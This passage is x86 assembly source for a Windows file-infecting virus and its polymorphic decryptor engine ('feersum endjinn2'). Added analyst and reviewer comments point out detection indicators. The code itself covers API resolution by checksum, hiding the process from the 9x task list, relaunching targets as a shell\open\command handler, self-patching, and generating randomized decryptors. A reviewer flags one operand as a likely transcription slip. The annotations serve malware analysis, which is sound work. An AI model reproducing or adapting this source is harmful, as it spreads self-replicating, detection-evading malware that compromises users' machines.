call store_restore
orgbytes label near ;decsize bytes of 90h (nop) as placeholder space
;NOTE(review): the "call store_restore" just above leaves this address on the
;stack where WriteProcessMemory() takes its lpBuffer, so this area presumably
;holds the host's saved original bytes, filled in elsewhere - confirm
db decsize dup (90h)
;-----------------------------------------------------------------------------
;WriteProcessMemory() is best to alter bytes because VirtualProtect() can fail
;store_restore: write the saved host bytes back over restore_loc in the running
;image, then restore the registers saved by the decryptor and jump to the
;stored entry point.
;Entered by "call store_restore", so the return address (= orgbytes) is already
;on the stack and sits where WriteProcessMemory() expects lpBuffer; nSize and
;lpNumberOfBytesWritten would have to be pushed before that call, outside this
;view - confirm.
;In:    ebx -> resolved API pointer block (regcrcstk / expcrcstk)
;Clobb: esi, eax; does not return
;Analyst note: WriteProcessMemory() on the GetCurrentProcess() pseudo-handle
;is a self-patching pattern that sidesteps VirtualProtect(); a process writing
;into its own image this way is a useful behavioural indicator.
;-----------------------------------------------------------------------------
store_restore label near
mov esi, offset restore_loc ;lpBaseAddress: place in the host being repaired
push esi
call dword ptr [ebx + 4 + size regcrcstk + expcrcstk.pGetCurrentProcess]
push eax ;hProcess = pseudo-handle to self
call dword ptr [ebx + 4 + size regcrcstk + expcrcstk.pWriteProcessMemory]
store_popsize label near
add esp, 'rgb!' ;imm32 placeholder; replaced by the org/dd pair below and
;patched again at run time by the generator (store_popsize + 2 = the imm32)
org $ - 4
dd popsize ;overwrite the 'rgb!' immediate so the add really uses popsize
push esi
pop esi ;no-op pair (filler)
popad ;restore the registers the generated decryptor saved with pushad
jmp dword ptr [esp - 24h] ;no stack change in ring 3
;(except in some debuggers)
;the target is a dword that was pushed after pushad and is now below esp; as
;the author notes, reading below esp is fragile when single-stepped in some
;debuggers, so this jump may misbehave under a tracer
;-----------------------------------------------------------------------------
;virus code begins here in dropped exe
;efishnc_exe: entry point of the dropped executable.  "call walk_seh" leaves
;the address of execrcbegin on the stack, so walk_seh (outside this view)
;receives the CRC table as its argument; the relative dword after the table
;presumably tells it where to resume (load_user32) - confirm in walk_seh.
;-----------------------------------------------------------------------------
efishnc_exe label near
call walk_seh
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;execrc_count entries plus a zero terminator, assembled as zeros here, so the
;checksums are filled in elsewhere (not shown).  Imports are resolved by
;checksum rather than by name string at this point, which matters for anyone
;writing string-based detections.
;-----------------------------------------------------------------------------
execrcbegin label near ;place < 80h bytes from call for smaller code
dd (execrc_count + 1) dup (0)
execrcend label near
dd offset load_user32 - offset execrcend + 4 ;continuation, relative to the table end
load_user32 label near
;load user32: the call skips the inline string and leaves its address on the
;stack, which is exactly the single argument LoadLibraryA() takes
call skip_user32
db "user32", 0
skip_user32 label near
call dword ptr [esp + execrcstk.eLoadLibraryA + 4] ;+4 steps over the pushed string address
call init_findmz ;presumably resolves the user32 CRC table below from eax = module handle - confirm
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;usrcrc_count zero-filled entries plus terminator, same scheme as execrcbegin
;-----------------------------------------------------------------------------
usrcrcbegin label near ;place < 80h bytes from call for smaller code
dd (usrcrc_count + 1) dup (0)
usrcrcend label near
dd offset get_cmdline - offset usrcrcend + 4 ;continuation, relative to the table end
;-----------------------------------------------------------------------------
;determine platform and dynamically select function types (ANSI or Unicode)
;get_cmdline: GetVersion() has bit 31 set on 9x/Me and clear on NT, so after
;shr 1fh eax = 1 (9x/Me) or 0 (NT).  esi = ebx + 4*eax then indexes the API
;pointer block one slot further on 9x/Me, which is how the A or W variant of
;each function is selected without branching.
;In:  esp -> resolved API pointers (usrcrcstk followed by execrcstk)
;Out: ebx -> pointer block, esi -> pointer block (A/W adjusted), eax = 0 or 1
;-----------------------------------------------------------------------------
get_cmdline label near
mov ebx, esp
call dword ptr [ebx + size usrcrcstk + execrcstk.eGetVersion]
shr eax, 1fh ;eax = 1 on 9x/Me, 0 on NT
lea esi, dword ptr [eax * 4 + ebx] ;shifted one slot on 9x/Me: picks the A entries
;-----------------------------------------------------------------------------
;RegisterServiceProcess() if 9x/Me (just sets one bit)
;al is 1 only on 9x/Me, so on NT the or below changes nothing.  Analyst note:
;the author equates this direct TEB write with RegisterServiceProcess(), the
;9x/Me API that removes a process from the task list; the flag is set without
;any API call, so it leaves no import or call trace.  Confirm the bit meaning
;against the teb struc definition, which is outside this view.
;-----------------------------------------------------------------------------
mov ecx, dword ptr fs:[tib.TibTeb]
or byte ptr [ecx + teb.procflags + 1], al ;bit 0 of byte procflags+1, only when al = 1
;-----------------------------------------------------------------------------
;parse command-line in platform-independent way to see how file was run
;On entry eax = 1 (9x/Me) or 0 (NT).  edi becomes a character mask, 00ffh for
;ANSI or 0ffffh for Unicode, so one loop handles both widths; ebp holds the
;argv0 delimiter ('"' when argv0 is quoted, else ' '); CharNext(A/W) advances
;one character at a time.  On exit eax -> first char of argv1 and ecx = that
;char, or ecx = 0 when the command line has no argv1.
;-----------------------------------------------------------------------------
dec ax ;ax = 0 (9x/Me) or 0ffffh (NT)
mov al, 0ffh
xchg edi, eax ;ffff if Unicode, 00ff if ANSI
call dword ptr [esi + size usrcrcstk + execrcstk.eGetCommandLineW] ;A variant on 9x/Me via the esi offset
stack_delta label near
mov ebp, dword ptr [eax]
and ebp, edi ;first character, masked to its width
cmp ebp, '"' ;Unicode-compatible compare
je skip_argv0 ;quoted argv0: the delimiter is the closing quote
push ' '
pop ebp ;otherwise the delimiter is a space
skip_argv0 label near
push eax
call dword ptr [esi + usrcrcstk.uCharNextW] ;eax -> next character
mov ecx, dword ptr [eax]
and ecx, edi
je argv1_skip ;end of string: no argv1 (ecx = 0)
cmp ecx, ebp
jne skip_argv0 ;loop until the argv0 delimiter
find_argv1 label near
push eax
call dword ptr [esi + usrcrcstk.uCharNextW] ;step past the delimiter, then any spaces
mov ecx, dword ptr [eax]
and ecx, edi
cmp ecx, ' ' ;Unicode-compatible compare
je find_argv1
argv1_skip label near
;-----------------------------------------------------------------------------
;if argv1 exists then argv0 was run using shell\open\command so run argv1
;ecx = first char of argv1 (0 if none), eax -> argv1.  CreateProcess(A/W) is
;called with lpCommandLine = argv1, STARTUPINFO/PROCESS_INFORMATION carved from
;the stack and every other argument zero, then the process exits.
;Analyst note: this is the handler-relay pattern the comment describes - the
;dropped exe is installed as a shell\open\command handler and re-launches the
;real target it was handed.  An unexpected executable in such a handler value
;is the artefact to look for; the target still runs, so the user sees nothing.
;-----------------------------------------------------------------------------
jecxz stack_copy ;no argv1: continue into the generator below
sub esp, size processinfo
mov edx, esp ;edx -> PROCESS_INFORMATION
sub esp, size startupinfo
mov ecx, esp ;ecx -> STARTUPINFO
push edx ;lpProcessInformation
push ecx ;lpStartupInfo
xor edx, edx
push edx ;lpCurrentDirectory = NULL
push edx ;lpEnvironment = NULL
push edx ;dwCreationFlags = 0
push edx ;bInheritHandles = FALSE
push edx ;lpThreadAttributes = NULL
push edx ;lpProcessAttributes = NULL
push eax ;lpCommandLine = argv1
push edx ;lpApplicationName = NULL
push ecx ;lpStartupInfo for GetStartupInfo()
call dword ptr [esi + size usrcrcstk + execrcstk.eGetStartupInfoW]
call dword ptr [esi + size usrcrcstk + execrcstk.eCreateProcessW]
call dword ptr [ebx + size usrcrcstk + execrcstk.eExitProcess] ;exit code = whatever dword is at [esp] (the STARTUPINFO buffer); never returns
;-----------------------------------------------------------------------------
;allocate stack space for RNG cache
;stack_copy: seed the RNG from GetTickCount() (returned in eax), reserve
;(statelen + 1) dwords of RNG state on the stack (edi -> state), and fetch the
;GlobalAlloc address into ebx, which from here on no longer points at the API
;pointer block.
;-----------------------------------------------------------------------------
stack_copy label near
call dword ptr [ebx + size usrcrcstk.execrcstk.eGetTickCount]
;RNG seed
;NOTE(review): the operand above reads "size usrcrcstk.execrcstk" where every
;sibling line uses "size usrcrcstk + execrcstk" - this looks like a transcription
;slip on this page; confirm against the original listing
enter (statelen + 1) shl 2, 0 ;RNG cache
mov edi, esp ;edi -> RNG state
mov ebx, dword ptr [ebx + size usrcrcstk + execrcstk.eGlobalAlloc]
push ebx ;save for kernel base later
;-----------------------------------------------------------------------------
;feersum endjinn2 - polymorphic decryptor with random line order
;Work buffer from GlobalAlloc(GMEM_ZEROINIT): decryptor area (decsize), then a
;256-byte xlat table, then garbage / second table / buffer / random regions
;whose relative positions are chosen at random below.
;The "mov dword ptr ds:[offset X - offset efishnc_inf + expsize + 401001h]"
;stores patch imm32 operands of instructions inside this very image: the
;address arithmetic assumes image base 400000h with code at 1000h, efishnc_inf
;as the start of the viral body and expsize as the stub before it (confirm
;both).  Writing to its own code implies the dropped exe's code section is
;writable - a static indicator (writable+executable section, hard-coded
;addresses) worth checking for in samples.
;edx holds the address of the random() routine for most of the generator;
;every "call edx" below is assumed to return a fresh random value in eax.
;-----------------------------------------------------------------------------
call randinit
push decsize + tblsize + grbgsize + tblsize + grbgsize + vsize + randsize + grbgsize
push GMEM_ZEROINIT ;zeroed memory matters: the bit table in fill_table relies on it
call ebx ;GlobalAlloc
push eax ;buffer base; popped into edi later as the decryptor write pointer
mov dword ptr ds:[offset store_decsrc - offset efishnc_inf + expsize + 401001h], eax ;+1 skips the opcode byte to reach the imm32
add eax, decsize
mov ebx, eax ;ebx -> xlat table area (filled by fill_table)
inc ah ;include old xlat table size
;(inc ah adds 100h, so tblsize is evidently 256)
mov dword ptr ds:[offset store_copysrc - offset efishnc_inf + expsize + 401001h], eax
mov esi, eax
xchg edi, eax ;edi -> start of the region to fill with garbage; eax = RNG state pointer
mov edx, offset random - offset efishnc_inf + expsize + 401000h ;edx = address of random() in this image
call edx
and eax, grbgsize - 1
add esi, eax ;table offset
call edx
and eax, grbgsize - 1
inc ah ;include new xlat table size
lea ebp, dword ptr [esi + eax] ;buffer offset
call edx
test al, 1
je init_table ;about half the time keep table-then-buffer order
mov ebp, esi ;buffer offset
call edx
and eax, randsize - 1
lea esi, dword ptr [ebp + eax + vsize]
;table offset (buffer-then-table order)
init_table label near
mov dword ptr ds:[offset store_encdst - offset efishnc_inf + expsize + 401001h], ebp
mov ecx, grbgsize + tblsize + grbgsize + vsize + randsize + grbgsize ;everything past the old table
init_buffer label near
call edx
stos byte ptr [edi] ;fill the rest of the buffer with random bytes
loop init_buffer ;leaves ecx = 0, which fill_table relies on
;-----------------------------------------------------------------------------
;bit table is constant time, and much faster than scasb with increasing range
;fill_table: build a 256-byte permutation at [ebx] from random bytes.  A
;256-bit "seen" bitmap at [ebx - tblsize/8] rejects duplicates: bts sets the
;bit and leaves its previous value in CF, so CF = 1 means the byte is already
;in the table.  The bitmap lies in the tail of the not-yet-written decryptor
;area and must still be zero here (GMEM_ZEROINIT).  ecx = 0 on entry, and cl
;counts 0..255 while the upper bytes of ecx stay zero.
;-----------------------------------------------------------------------------
fill_table label near
call edx
movzx eax, al ;candidate byte, zero-extended for use as bit index
bts dword ptr [ebx - (tblsize shr 3)], eax
jb fill_table ;already in table
mov byte ptr [ebx + ecx], al
inc cl
jne fill_table ;fill with 256 unique values
transform label near
;build the inverse permutation at [esi]: for each cl, al = table[cl] and
;inverse[al] = cl.  cl wrapped to 0 at the end of fill_table, and eax's upper
;bytes are still zero from the movzx there.
mov al, cl
xlat byte ptr [ebx] ;al = table[cl]
mov byte ptr [esi + eax], cl ;inverse[al] = cl
inc cl
jne transform
;-----------------------------------------------------------------------------
;choose the decryptor's shape: random state_* bits accumulate in bl.  After
;the xchg, ebx no longer holds the table pointer (eax is overwritten by the
;next call).  state_pushb is only allowed together with state_pushret and
;only when state_decdown is clear.
;-----------------------------------------------------------------------------
call edx
and eax, state_decdown
xchg ebx, eax ;ebx = flags so far
call edx
and al, state_esifirst
or bl, al
call edx
and al, state_pushret
je skip_pushb ;no pushret: pushb is not an option either
or bl, al
call edx
test bl, state_decdown
jne skip_pushb ;downward decryption excludes pushb
and al, state_pushb
or bl, al
skip_pushb label near
call edx
and al, state_movesi
or bl, al
call edx
and al, state_movedi
or bl, al
call edx
and al, state_jg
or bl, al
;-----------------------------------------------------------------------------
;select random register from ecx, edx, esi, edi (if not stosb)
;rand_reg1: draw 3-bit register codes until one of ecx(1)/edx(2)/esi(6)/edi(7)
;comes up; edi is accepted only when state_movedi is set (clear means the
;decryptor uses stosb and needs edi itself).  eax, ebx, ebp, esp are never
;chosen.  save_reg1 leaves dl = chosen code and moves the random() address
;from edx into edi, so later draws use "call edi"; edi's previous value is
;not needed (eax is overwritten by the next call).
;-----------------------------------------------------------------------------
rand_reg1 label near
call edx
and al, 7
cmp al, 1 ;ecx
je save_reg1
cmp al, 2 ;edx
je save_reg1
cmp al, 6 ;esi
je save_reg1
cmp al, 7 ;edi
jne rand_reg1
test bl, state_movedi
je rand_reg1 ;no edi if stosb
save_reg1 label near
xchg edx, eax ;dl = first register code; eax = random() address
xchg edi, eax ;edi = random() address
;-----------------------------------------------------------------------------
;select random register from ecx, edx, esi (if not lodsb), edi
;rand_reg2: same draw as rand_reg1 (random() now called through edi), but the
;code must differ from dl, and esi is accepted only when state_movesi is set
;(clear means lodsb is used).  dh = second code.  Then:
;  edi = work buffer base (the GlobalAlloc result pushed earlier); the
;        generated decryptor is written here, starting with pushad (60h)
;  ecx = dword-aligned random extra stack size
;  ebp = enter size (extra + vsize)
;  store_popsize's imm32 is patched with extra + vsize + popsize; the +2 in
;        that address skips the two opcode bytes of "add esp, imm32"
;  the 16-bit adds keep the sizes under 64kb, as the inline comment says
;-----------------------------------------------------------------------------
rand_reg2 label near
call edi
and al, 7
cmp al, dl
je rand_reg2 ;no register in use
cmp al, 1 ;ecx
je save_reg2
cmp al, 2 ;edx
je save_reg2
cmp al, 7 ;edi
je save_reg2
cmp al, 6
jne rand_reg2 ;no eax, ebx, ebp
test bl, state_movesi
je rand_reg2 ;no esi if lodsb
save_reg2 label near
mov dh, al
call edi
pop edi ;edi = work buffer base
push edx ;save both register codes
push ebp ;buffer offset
and eax, (randsize - 1) and -4 ;dword align
mov ecx, eax ;random extra size
add ax, small vsize ;64kb limit
mov ebp, eax ;enter size
add ax, popsize
mov dword ptr ds:[offset store_popsize - offset efishnc_inf + expsize + 401002h], eax ;patch the add esp in store_restore
mov al, 60h ;pushad
stos byte ptr [edi] ;first byte of the generated decryptor
;-----------------------------------------------------------------------------
;store_block1: pick a uniform index in [0, block1cmp) by rejection sampling
;(mask with block1and, retry when >= block1cmp) and dispatch through the
;procblock1 word table.  The dispatch loop in callblock1 continues past the
;end of this view.
;-----------------------------------------------------------------------------
store_block1 label near
call random ;direct call here, unlike the call edx/edi form used above
and eax, block1and
cmp al, block1cmp
jnb store_block1 ;out of range: draw again (unsigned compare)
call callblock1 ;pushes the address of procblock1, which callblock1 pops as the table base
;-----------------------------------------------------------------------------
;block 1 contains: mov ebx/ecx/edx/esi, lea ecx/edx/esi/ebx, enter, mov ecx/edx/edi
;std (if down direction) and possibly push (if using ret to jump)
;randomly cmc/stc/cld (if up direction)
;example 1:
;enter vsize + random size, 0
;std
;mov esi, offset encrypted block end + random size
;push esp
;mov edi, ebp
;lea ebx, dword ptr [esi + offset xlat table]
;example 2:
;mov ebx, offset xlat table
;enter vsize + random size, 0
;lea esi, dword ptr [ebx + offset encrypted block begin]
;mov edi, esp
;example 3:
;mov edx, offset encrypted block begin
;lea ebx, dword ptr [edx + offset xlat table]
;enter vsize + random size, 0
;mov edi, esp
;cmc
;push edi
;Analyst note: the emitted prologue always amounts to pushad, an enter of
;vsize plus a random size, register setup for the table and buffer, and an
;optional std/push - a stable behavioural skeleton even though the byte order
;and registers vary per sample.
;-----------------------------------------------------------------------------
procblock1 label near
;word offsets, relative to procblock1, of the six block-1 emitters; indexed by
;the random value chosen in store_block1 and resolved by callblock1
dw offset storeebx - offset procblock1
dw offset storeesi - offset procblock1
dw offset storeenter - offset procblock1
dw offset storeedi - offset procblock1
dw offset storestd - offset procblock1
dw offset storepushb - offset procblock1
callblock1 label near
pop edx
movzx eax, word ptr [eax * 2 + edx]
add eax, edx
call eax
cmp bh, block1done